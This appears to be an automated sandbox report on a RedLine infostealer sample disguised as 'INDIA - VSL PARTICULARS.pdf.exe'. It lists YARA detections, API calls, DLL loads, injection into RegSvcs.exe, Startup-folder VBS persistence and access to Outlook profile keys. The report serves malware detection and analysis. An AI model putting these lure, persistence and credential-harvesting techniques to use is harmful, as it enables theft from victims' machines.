    Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 6_2_0047C81C SendMessageW,DefDlgProcW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,GetWindowLongW,SendMessageW,SendMessageW,SendMessageW,_wcsncpy,SendMessageW,SendMessageW,SendMessageW,InvalidateRect,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,6_2_0047C81C

    System Summary

    barindex
    Malicious sample detected (through community Yara rule)
    Source: 8.2.name.exe.1690000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
    Source: 2.2.name.exe.2b70000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
    Source: 6.2.name.exe.37b0000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
    Source: 00000008.00000002.2403356452.0000000001690000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects RedLine infostealer Author: ditekSHen
    Source: 00000006.00000002.2366519068.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects RedLine infostealer Author: ditekSHen
    Source: 00000002.00000002.2229607380.0000000002B70000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects RedLine infostealer Author: ditekSHen
    Initial sample is a PE file and has a suspicious name
    Source: initial sampleStatic PE information: Filename: INDIA - VSL PARTICULARS.pdf.exe
    Windows Scripting host queries suspicious COM object (likely to drop second stage)
    Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
    Source: C:\Users\user\Desktop\INDIA - VSL PARTICULARS.pdf.exeCode function: 0_2_00431BE8: GetFullPathNameW,__swprintf,_wcslen,CreateDirectoryW,CreateFileW,_wcsncpy,DeviceIoControl,CloseHandle,RemoveDirectoryW,CloseHandle,0_2_00431BE8
    Source: C:\Users\user\Desktop\INDIA - VSL PARTICULARS.pdf.exeCode function: 0_2_00446313 DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,_wcsncpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,0_2_00446313
    Source: C:\Users\user\Desktop\INDIA - VSL PARTICULARS.pdf.exeCode function: 0_2_004333BE GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,SetSystemPowerState,0_2_004333BE
    Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 6_2_004333BE GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,SetSystemPowerState,6_2_004333BE
    Source: C:\Users\user\Desktop\INDIA - VSL PARTICULARS.pdf.exeCode function: 0_2_004096A00_2_004096A0
    Source: C:\Users\user\Desktop\INDIA - VSL PARTICULARS.pdf.exeCode function: 0_2_0042200C0_2_0042200C
    Source: C:\Users\user\Desktop\INDIA - VSL PARTICULARS.pdf.exeCode function: 0_2_0041A2170_2_0041A217
    Source: C:\Users\user\Desktop\INDIA - VSL PARTICULARS.pdf.exeCode function: 0_2_004122160_2_00412216
    Source: C:\Users\user\Desktop\INDIA - VSL PARTICULARS.pdf.exeCode function: 0_2_0042435D0_2_0042435D
    Source: C:\Users\user\Desktop\INDIA - VSL PARTICULARS.pdf.exeCode function: 0_2_004033C00_2_004033C0
    Source: C:\Users\user\Desktop\INDIA - VSL PARTICULARS.pdf.exeCode function: 0_2_0044F4300_2_0044F430
    Source: C:\Users\user\Desktop\INDIA - VSL PARTICULARS.pdf.exeCode function: 0_2_004125E80_2_004125E8
    Source: C:\Users\user\Desktop\INDIA - VSL PARTICULARS.pdf.exeCode function: 0_2_0044663B0_2_0044663B
    Source: C:\Users\user\Desktop\INDIA - VSL PARTICULARS.pdf.exeCode function: 0_2_004138010_2_00413801
    Source: C:\Users\user\Desktop\INDIA - VSL PARTICULARS.pdf.exeCode function: 0_2_0042096F0_2_0042096F
    Source: C:\Users\user\Desktop\INDIA - VSL PARTICULARS.pdf.exeCode function: 0_2_004129D00_2_004129D0
    Source: C:\Users\user\Desktop\INDIA - VSL PARTICULARS.pdf.exeCode function: 0_2_004119E30_2_004119E3
    Source: C:\Users\user\Desktop\INDIA - VSL PARTICULARS.pdf.exeCode function: 0_2_0041C9AE0_2_0041C9AE
    Source: C:\Users\user\Desktop\INDIA - VSL PARTICULARS.pdf.exeCode function: 0_2_0047EA6F0_2_0047EA6F
    Source: C:\Users\user\Desktop\INDIA - VSL PARTICULARS.pdf.exeCode function: 0_2_0040FA100_2_0040FA10
    Source: C:\Users\user\Desktop\INDIA - VSL PARTICULARS.pdf.exeCode function: 0_2_0044EB5F0_2_0044EB5F
    Source: C:\Users\user\Desktop\INDIA - VSL PARTICULARS.pdf.exeCode function: 0_2_00423C810_2_00423C81
    Source: C:\Users\user\Desktop\INDIA - VSL PARTICULARS.pdf.exeCode function: 0_2_00411E780_2_00411E78
    Source: C:\Users\user\Desktop\INDIA - VSL PARTICULARS.pdf.exeCode function: 0_2_00442E0C0_2_00442E0C
    Source: C:\Users\user\Desktop\INDIA - VSL PARTICULARS.pdf.exeCode function: 0_2_00420EC00_2_00420EC0
    Source: C:\Users\user\Desktop\INDIA - VSL PARTICULARS.pdf.exeCode function: 0_2_0044CF170_2_0044CF17
    Source: C:\Users\user\Desktop\INDIA - VSL PARTICULARS.pdf.exeCode function: 0_2_00444FD20_2_00444FD2
    Source: C:\Users\user\Desktop\INDIA - VSL PARTICULARS.pdf.exeCode function: 0_2_03F20B180_2_03F20B18
    Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 2_2_03FD36902_2_03FD3690
    Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 6_2_004096A06_2_004096A0
    Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 6_2_0042200C6_2_0042200C
    Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 6_2_0041A2176_2_0041A217
    Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 6_2_004122166_2_00412216
    Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 6_2_0042435D6_2_0042435D
    Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 6_2_004033C06_2_004033C0
    Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 6_2_0044F4306_2_0044F430
    Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 6_2_004125E86_2_004125E8
    Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 6_2_0044663B6_2_0044663B
    Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 6_2_004138016_2_00413801
    Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 6_2_0042096F6_2_0042096F
    Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 6_2_004129D06_2_004129D0
    Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 6_2_004119E36_2_004119E3
    Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 6_2_0041C9AE6_2_0041C9AE
    Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 6_2_0047EA6F6_2_0047EA6F
    Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 6_2_0040FA106_2_0040FA10
    Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 6_2_0044EB5F6_2_0044EB5F
    Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 6_2_00423C816_2_00423C81
    Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 6_2_00411E786_2_00411E78
    Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 6_2_00442E0C6_2_00442E0C
    Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 6_2_00420EC06_2_00420EC0
    Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 6_2_0044CF176_2_0044CF17
    Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 6_2_00444FD26_2_00444FD2
    Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 6_2_03F1FE806_2_03F1FE80
    Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 8_2_03F936908_2_03F93690
    Source: C:\Users\user\AppData\Local\directory\name.exeCode function: String function: 004115D7 appears 36 times
    Source: C:\Users\user\AppData\Local\directory\name.exeCode function: String function: 00416C70 appears 39 times
    Source: C:\Users\user\AppData\Local\directory\name.exeCode function: String function: 00445AE0 appears 65 times
    Source: C:\Users\user\Desktop\INDIA - VSL PARTICULARS.pdf.exeCode function: String function: 004115D7 appears 36 times
    Source: C:\Users\user\Desktop\INDIA - VSL PARTICULARS.pdf.exeCode function: String function: 00416C70 appears 39 times
    Source: C:\Users\user\Desktop\INDIA - VSL PARTICULARS.pdf.exeCode function: String function: 00445AE0 appears 65 times
    Source: INDIA - VSL PARTICULARS.pdf.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
    Source: 8.2.name.exe.1690000.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
    Source: 2.2.name.exe.2b70000.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
    Source: 6.2.name.exe.37b0000.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
    Source: 00000008.00000002.2403356452.0000000001690000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
    Source: 00000006.00000002.2366519068.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
    Source: 00000002.00000002.2229607380.0000000002B70000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
    Source: classification engineClassification label: mal100.troj.spyw.expl.evad.winEXE@18/3@2/2
    Source: C:\Users\user\Desktop\INDIA - VSL PARTICULARS.pdf.exeCode function: 0_2_0044AF6C GetLastError,FormatMessageW,0_2_0044AF6C
    Source: C:\Users\user\Desktop\INDIA - VSL PARTICULARS.pdf.exeCode function: 0_2_004333BE GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,SetSystemPowerState,0_2_004333BE
    Source: C:\Users\user\Desktop\INDIA - VSL PARTICULARS.pdf.exeCode function: 0_2_00464EAE OpenProcess,GetLastError,GetLastError,GetCurrentThread,OpenThreadToken,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,AdjustTokenPrivileges,GetLastError,OpenProcess,AdjustTokenPrivileges,CloseHandle,TerminateProcess,GetLastError,CloseHandle,0_2_00464EAE
    Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 6_2_004333BE GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,SetSystemPowerState,6_2_004333BE
    Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 6_2_00464EAE OpenProcess,GetLastError,GetLastError,GetCurrentThread,OpenThreadToken,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,AdjustTokenPrivileges,GetLastError,OpenProcess,AdjustTokenPrivileges,CloseHandle,TerminateProcess,GetLastError,CloseHandle,6_2_00464EAE
    Source: C:\Users\user\Desktop\INDIA - VSL PARTICULARS.pdf.exeCode function: 0_2_0045D619 SetErrorMode,GetDiskFreeSpaceW,GetLastError,SetErrorMode,0_2_0045D619
    Source: C:\Users\user\Desktop\INDIA - VSL PARTICULARS.pdf.exeCode function: 0_2_004755C4 CreateToolhelp32Snapshot,Process32FirstW,__wsplitpath,_wcscat,__wcsicoll,Process32NextW,CloseHandle,0_2_004755C4
    Source: C:\Users\user\Desktop\INDIA - VSL PARTICULARS.pdf.exeCode function: 0_2_0047839D CoInitialize,CoCreateInstance,CoUninitialize,0_2_0047839D
    Source: C:\Users\user\Desktop\INDIA - VSL PARTICULARS.pdf.exeCode function: 0_2_0043305F __swprintf,__swprintf,__wcsicoll,FindResourceW,LoadResource,LockResource,FindResourceW,LoadResource,SizeofResource,LockResource,CreateIconFromResourceEx,0_2_0043305F
    Source: C:\Users\user\Desktop\INDIA - VSL PARTICULARS.pdf.exeFile created: C:\Users\user\AppData\Local\directoryJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeMutant created: NULL
    Source: C:\Users\user\Desktop\INDIA - VSL PARTICULARS.pdf.exeFile created: C:\Users\user\AppData\Local\Temp\iodizationJump to behavior
    Source: unknownProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\name.vbs"
    Source: C:\Users\user\Desktop\INDIA - VSL PARTICULARS.pdf.exeCommand line argument: #v0_2_0040D6B0
    Source: C:\Users\user\AppData\Local\directory\name.exeCommand line argument: #v6_2_0040D6B0
    Source: INDIA - VSL PARTICULARS.pdf.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
    Source: C:\Users\user\Desktop\INDIA - VSL PARTICULARS.pdf.exeFile read: C:\Users\desktop.iniJump to behavior
    Source: C:\Users\user\Desktop\INDIA - VSL PARTICULARS.pdf.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
    Source: INDIA - VSL PARTICULARS.pdf.exeVirustotal: Detection: 27%
    Source: C:\Users\user\Desktop\INDIA - VSL PARTICULARS.pdf.exeFile read: C:\Users\user\Desktop\INDIA - VSL PARTICULARS.pdf.exeJump to behavior
    Source: unknownProcess created: C:\Users\user\Desktop\INDIA - VSL PARTICULARS.pdf.exe "C:\Users\user\Desktop\INDIA - VSL PARTICULARS.pdf.exe"
    Source: C:\Users\user\Desktop\INDIA - VSL PARTICULARS.pdf.exeProcess created: C:\Users\user\AppData\Local\directory\name.exe "C:\Users\user\Desktop\INDIA - VSL PARTICULARS.pdf.exe"
    Source: C:\Users\user\AppData\Local\directory\name.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\Desktop\INDIA - VSL PARTICULARS.pdf.exe"
    Source: unknownProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\name.vbs"
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\directory\name.exe "C:\Users\user\AppData\Local\directory\name.exe"
    Source: C:\Users\user\AppData\Local\directory\name.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\AppData\Local\directory\name.exe"
    Source: C:\Users\user\AppData\Local\directory\name.exeProcess created: C:\Users\user\AppData\Local\directory\name.exe "C:\Users\user\AppData\Local\directory\name.exe"
    Source: C:\Users\user\AppData\Local\directory\name.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\AppData\Local\directory\name.exe"
    Source: C:\Users\user\AppData\Local\directory\name.exeProcess created: C:\Users\user\AppData\Local\directory\name.exe "C:\Users\user\AppData\Local\directory\name.exe"
    Source: C:\Users\user\AppData\Local\directory\name.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\AppData\Local\directory\name.exe"
    Source: C:\Users\user\Desktop\INDIA - VSL PARTICULARS.pdf.exeProcess created: C:\Users\user\AppData\Local\directory\name.exe "C:\Users\user\Desktop\INDIA - VSL PARTICULARS.pdf.exe"Jump to behavior
    Source: C:\Users\user\AppData\Local\directory\name.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\Desktop\INDIA - VSL PARTICULARS.pdf.exe"Jump to behavior
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\directory\name.exe "C:\Users\user\AppData\Local\directory\name.exe" Jump to behavior
    Source: C:\Users\user\AppData\Local\directory\name.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\AppData\Local\directory\name.exe" Jump to behavior
    Source: C:\Users\user\AppData\Local\directory\name.exeProcess created: C:\Users\user\AppData\Local\directory\name.exe "C:\Users\user\AppData\Local\directory\name.exe"Jump to behavior
    Source: C:\Users\user\AppData\Local\directory\name.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\AppData\Local\directory\name.exe"Jump to behavior
    Source: C:\Users\user\AppData\Local\directory\name.exeProcess created: C:\Users\user\AppData\Local\directory\name.exe "C:\Users\user\AppData\Local\directory\name.exe"Jump to behavior
    Source: C:\Users\user\AppData\Local\directory\name.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\AppData\Local\directory\name.exe"Jump to behavior
    Source: C:\Users\user\Desktop\INDIA - VSL PARTICULARS.pdf.exeSection loaded: apphelp.dllJump to behavior
    Source: C:\Users\user\Desktop\INDIA - VSL PARTICULARS.pdf.exeSection loaded: wsock32.dllJump to behavior
    Source: C:\Users\user\Desktop\INDIA - VSL PARTICULARS.pdf.exeSection loaded: version.dllJump to behavior
    Source: C:\Users\user\Desktop\INDIA - VSL PARTICULARS.pdf.exeSection loaded: winmm.dllJump to behavior
    Source: C:\Users\user\Desktop\INDIA - VSL PARTICULARS.pdf.exeSection loaded: mpr.dllJump to behavior
    Source: C:\Users\user\Desktop\INDIA - VSL PARTICULARS.pdf.exeSection loaded: wininet.dllJump to behavior
    Source: C:\Users\user\Desktop\INDIA - VSL PARTICULARS.pdf.exeSection loaded: userenv.dllJump to behavior
    Source: C:\Users\user\Desktop\INDIA - VSL PARTICULARS.pdf.exeSection loaded: uxtheme.dllJump to behavior
    Source: C:\Users\user\Desktop\INDIA - VSL PARTICULARS.pdf.exeSection loaded: windows.storage.dllJump to behavior
    Source: C:\Users\user\Desktop\INDIA - VSL PARTICULARS.pdf.exeSection loaded: wldp.dllJump to behavior
    Source: C:\Users\user\Desktop\INDIA - VSL PARTICULARS.pdf.exeSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Users\user\Desktop\INDIA - VSL PARTICULARS.pdf.exeSection loaded: cryptsp.dllJump to behavior
    Source: C:\Users\user\Desktop\INDIA - VSL PARTICULARS.pdf.exeSection loaded: rsaenh.dllJump to behavior
    Source: C:\Users\user\Desktop\INDIA - VSL PARTICULARS.pdf.exeSection loaded: cryptbase.dllJump to behavior
    Source: C:\Users\user\AppData\Local\directory\name.exeSection loaded: apphelp.dllJump to behavior
    Source: C:\Users\user\AppData\Local\directory\name.exeSection loaded: wsock32.dllJump to behavior
    Source: C:\Users\user\AppData\Local\directory\name.exeSection loaded: version.dllJump to behavior
    Source: C:\Users\user\AppData\Local\directory\name.exeSection loaded: winmm.dllJump to behavior
    Source: C:\Users\user\AppData\Local\directory\name.exeSection loaded: mpr.dllJump to behavior
    Source: C:\Users\user\AppData\Local\directory\name.exeSection loaded: wininet.dllJump to behavior
    Source: C:\Users\user\AppData\Local\directory\name.exeSection loaded: userenv.dllJump to behavior
    Source: C:\Users\user\AppData\Local\directory\name.exeSection loaded: uxtheme.dllJump to behavior
    Source: C:\Users\user\AppData\Local\directory\name.exeSection loaded: windows.storage.dllJump to behavior
    Source: C:\Users\user\AppData\Local\directory\name.exeSection loaded: wldp.dllJump to behavior
    Source: C:\Users\user\AppData\Local\directory\name.exeSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: mlang.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: slc.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
    Source: C:\Users\user\AppData\Local\directory\name.exeSection loaded: wsock32.dllJump to behavior
    Source: C:\Users\user\AppData\Local\directory\name.exeSection loaded: version.dllJump to behavior
    Source: C:\Users\user\AppData\Local\directory\name.exeSection loaded: winmm.dllJump to behavior
    Source: C:\Users\user\AppData\Local\directory\name.exeSection loaded: mpr.dllJump to behavior
    Source: C:\Users\user\AppData\Local\directory\name.exeSection loaded: wininet.dllJump to behavior
    Source: C:\Users\user\AppData\Local\directory\name.exeSection loaded: userenv.dllJump to behavior
    Source: C:\Users\user\AppData\Local\directory\name.exeSection loaded: uxtheme.dllJump to behavior
    Source: C:\Users\user\AppData\Local\directory\name.exeSection loaded: windows.storage.dllJump to behavior
    Source: C:\Users\user\AppData\Local\directory\name.exeSection loaded: wldp.dllJump to behavior
    Source: C:\Users\user\AppData\Local\directory\name.exeSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Users\user\AppData\Local\directory\name.exeSection loaded: wsock32.dllJump to behavior
    Source: C:\Users\user\AppData\Local\directory\name.exeSection loaded: version.dllJump to behavior
    Source: C:\Users\user\AppData\Local\directory\name.exeSection loaded: winmm.dllJump to behavior
    Source: C:\Users\user\AppData\Local\directory\name.exeSection loaded: mpr.dllJump to behavior
    Source: C:\Users\user\AppData\Local\directory\name.exeSection loaded: wininet.dllJump to behavior
    Source: C:\Users\user\AppData\Local\directory\name.exeSection loaded: userenv.dllJump to behavior
    Source: C:\Users\user\AppData\Local\directory\name.exeSection loaded: uxtheme.dllJump to behavior
    Source: C:\Users\user\AppData\Local\directory\name.exeSection loaded: windows.storage.dllJump to behavior
    Source: C:\Users\user\AppData\Local\directory\name.exeSection loaded: wldp.dllJump to behavior
    Source: C:\Users\user\AppData\Local\directory\name.exeSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Users\user\AppData\Local\directory\name.exeSection loaded: wsock32.dllJump to behavior
    Source: C:\Users\user\AppData\Local\directory\name.exeSection loaded: version.dllJump to behavior
    Source: C:\Users\user\AppData\Local\directory\name.exeSection loaded: winmm.dllJump to behavior
    Source: C:\Users\user\AppData\Local\directory\name.exeSection loaded: mpr.dllJump to behavior
    Source: C:\Users\user\AppData\Local\directory\name.exeSection loaded: wininet.dllJump to behavior
    Source: C:\Users\user\AppData\Local\directory\name.exeSection loaded: userenv.dllJump to behavior
    Source: C:\Users\user\AppData\Local\directory\name.exeSection loaded: uxtheme.dllJump to behavior
    Source: C:\Users\user\AppData\Local\directory\name.exeSection loaded: windows.storage.dllJump to behavior
    Source: C:\Users\user\AppData\Local\directory\name.exeSection loaded: wldp.dllJump to behavior
    Source: C:\Users\user\AppData\Local\directory\name.exeSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Users\user\Desktop\INDIA - VSL PARTICULARS.pdf.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32Jump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\Outlook\ProfilesJump to behavior
    Source: INDIA - VSL PARTICULARS.pdf.exeStatic file information: File size 1285979 > 1048576
    Source: Binary string: wntdll.pdbUGP source: name.exe, 00000002.00000003.2227032386.00000000047D0000.00000004.00001000.00020000.00000000.sdmp, name.exe, 00000002.00000003.2226523260.0000000004630000.00000004.00001000.00020000.00000000.sdmp, name.exe, 00000006.00000003.2364292019.00000000045D0000.00000004.00001000.00020000.00000000.sdmp, name.exe, 00000006.00000003.2364812639.0000000004770000.00000004.00001000.00020000.00000000.sdmp, name.exe, 00000008.00000003.2400599794.0000000004770000.00000004.00001000.00020000.00000000.sdmp, name.exe, 00000008.00000003.2400477243.00000000045D0000.00000004.00001000.00020000.00000000.sdmp, name.exe, 0000000A.00000003.2437273788.00000000045C0000.00000004.00001000.00020000.00000000.sdmp, name.exe, 0000000A.00000003.2437000845.0000000004760000.00000004.00001000.00020000.00000000.sdmp
